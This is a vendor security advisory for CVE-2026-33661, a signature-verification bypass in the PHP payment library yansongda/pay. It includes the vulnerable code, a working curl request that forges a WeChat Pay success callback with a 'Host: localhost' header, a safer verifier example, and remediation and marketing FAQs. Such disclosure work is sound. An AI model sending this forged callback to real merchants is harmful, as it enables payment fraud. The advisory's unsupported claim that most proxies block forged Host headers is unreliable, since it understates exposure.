CVE-2026-33661

CVE-2026-33661 is a high-severity security vulnerability in yansongda/pay (composer), affecting versions <= 3.7.19. It is fixed in 3.7.20.

Summary

The verify_wechat_sign() function in src/Functions.php unconditionally skips all signature verification when the PSR-7 request reports localhost as the host. An attacker can exploit this by sending a crafted HTTP request to the WeChat Pay callback endpoint with a Host: localhost header, bypassing the RSA signature check entirely.

This allows forging fake WeChat Pay payment success notifications, potentially causing applications to mark orders as paid without actual payment.

Vulnerable Code

src/Functions.php lines 243-246:

function verify_wechat_sign(ResponseInterface|ServerRequestInterface $message, array $params): void
{
    // BYPASS: Returns without any signature check if Host header is localhost
    if ($message instanceof ServerRequestInterface && 'localhost' === $message->getUri()->getHost()) {
        return;  // No signature verified!
    }

    // ... openssl_verify() only reached when Host != localhost
    $wechatSerial = $message->getHeaderLine('Wechatpay-Serial');
    $sign = $message->getHeaderLine('Wechatpay-Signature');
    $result = 1 === openssl_verify($content, base64_decode($sign), $public, 'sha256WithRSAEncryption');
}

In PSR-7 implementations (Nyholm, Guzzle PSR-7, etc.), $request->getUri()->getHost() reads the Host HTTP header, which is fully attacker-controlled.

Proof of Concept

curl -X POST https://merchant.example.com/payment/wechat/callback \
  -H "Host: localhost" \
  -H "Content-Type: application/json" \
  -H "Wechatpay-Serial: any" \
  -H "Wechatpay-Timestamp: 1234567890" \
  -H "Wechatpay-Nonce: abc" \
  -H "Wechatpay-Signature: AAAA" \
  -d '{"id":"fake-order","event_type":"TRANSACTION.SUCCESS"}'

verify_wechat_sign() returns immediately without verifying the signature. The application marks the order as paid.
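For contrast with the vulnerable function above, the following is an added example (not code from yansongda/pay; the project's own 3.7.20 fix is not reproduced here) of a callback verifier that never branches on the Host header and rejects the request shape shown in the PoC. It assumes plain arrays of lower-cased headers instead of a PSR-7 object, WeChat Pay's documented v3 signing string, and a freshly generated key pair standing in for the platform certificate.

```php
<?php
declare(strict_types=1);
// Added example, not code from yansongda/pay: a WeChat Pay v3 callback verifier with
// no Host-based shortcut. "timestamp\nnonce\nbody\n" is WeChat Pay's documented v3
// signing string; the header names are those shown in the advisory above.

/** @param array<string,string> $headers lower-cased header name => value */
function verify_wechat_v3(array $headers, string $body, array $platformCerts, int $now): bool
{
    // The Host header is never consulted: trust comes only from a signature that
    // verifies against a platform certificate we already hold, selected by serial.
    $serial = $headers['wechatpay-serial'] ?? '';
    if (!isset($platformCerts[$serial])) {
        return false;
    }
    // Reject malformed or stale timestamps (5-minute freshness window chosen here).
    $ts = $headers['wechatpay-timestamp'] ?? '';
    if (!preg_match('/^\d+$/', $ts) || abs($now - (int) $ts) > 300) {
        return false;
    }
    // Rebuild the signed message and check the RSA-SHA256 signature over it.
    $message = $ts . "\n" . ($headers['wechatpay-nonce'] ?? '') . "\n" . $body . "\n";
    $sig = base64_decode($headers['wechatpay-signature'] ?? '', true);
    if ($sig === false || $sig === '') {
        return false;
    }
    return 1 === openssl_verify($message, $sig, $platformCerts[$serial], OPENSSL_ALGO_SHA256);
}

// Self-check: a freshly generated key pair stands in for the WeChat platform certificate.
$key = openssl_pkey_new(['private_key_bits' => 2048, 'private_key_type' => OPENSSL_KEYTYPE_RSA]);
$certs = ['TEST-SERIAL' => openssl_pkey_get_details($key)['key']]; // constructed serial
$now = time();
$body = '{"id":"evt-1","event_type":"TRANSACTION.SUCCESS"}';       // constructed body
$nonce = bin2hex(random_bytes(16));
openssl_sign("$now\n$nonce\n$body\n", $rawSig, $key, OPENSSL_ALGO_SHA256);
$genuine = ['wechatpay-serial' => 'TEST-SERIAL', 'wechatpay-timestamp' => (string) $now,
            'wechatpay-nonce' => $nonce, 'wechatpay-signature' => base64_encode($rawSig)];
// Same shape as the advisory's PoC request: Host: localhost, unknown serial, bogus signature.
$forged = ['host' => 'localhost', 'wechatpay-serial' => 'any', 'wechatpay-timestamp' => '1234567890',
           'wechatpay-nonce' => 'abc', 'wechatpay-signature' => 'AAAA'];
// A genuine signature presented with a different body must also fail.
$replayed = $genuine;
$otherBody = '{"id":"evt-2","event_type":"TRANSACTION.SUCCESS"}';
$ok = verify_wechat_v3($genuine, $body, $certs, $now)
    && !verify_wechat_v3($forged, $body, $certs, $now)
    && !verify_wechat_v3($replayed, $otherBody, $certs, $now);
echo $ok ? "self-check passed\n" : "self-check FAILED\n";
```

Run with `php verify.php` on any PHP 8 build with the openssl extension; no Composer packages are needed.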

Impact

  • Payment fraud: Attacker receives goods/services without actual payment by forging WeChat Pay callbacks
  • No authentication required: Pure network attack, zero privileges needed
  • Wide reach: Affects any application using yansongda/pay to validate WeChat Pay callbacks. In most deployments, however, a front-end proxy (Nginx, an Ingress controller, Cloudflare or a WAF) will reject a request carrying a forged Host header outright, which limits practical exposure.

CVE-2026-33661 has a CVSS score of 8.6 (High). The attack vector is network, with no privileges required and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.7.20); upgrading removes the vulnerable code path.

Affected versions

yansongda/pay (<= 3.7.19)

Security releases

yansongda/pay → 3.7.20 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade yansongda/pay to 3.7.20 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-33661? CVE-2026-33661 is a high-severity security vulnerability in yansongda/pay (composer), affecting versions <= 3.7.19. It is fixed in 3.7.20.
  2. How severe is CVE-2026-33661? CVE-2026-33661 has a CVSS score of 8.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of yansongda/pay are affected by CVE-2026-33661? yansongda/pay (composer) versions <= 3.7.19 are affected.
  4. Is there a fix for CVE-2026-33661? Yes. CVE-2026-33661 is fixed in 3.7.20. Upgrade to this version or later.
  5. Is CVE-2026-33661 exploitable, and should I be worried? Whether CVE-2026-33661 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-33661 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33661? Upgrade yansongda/pay to 3.7.20 or later.

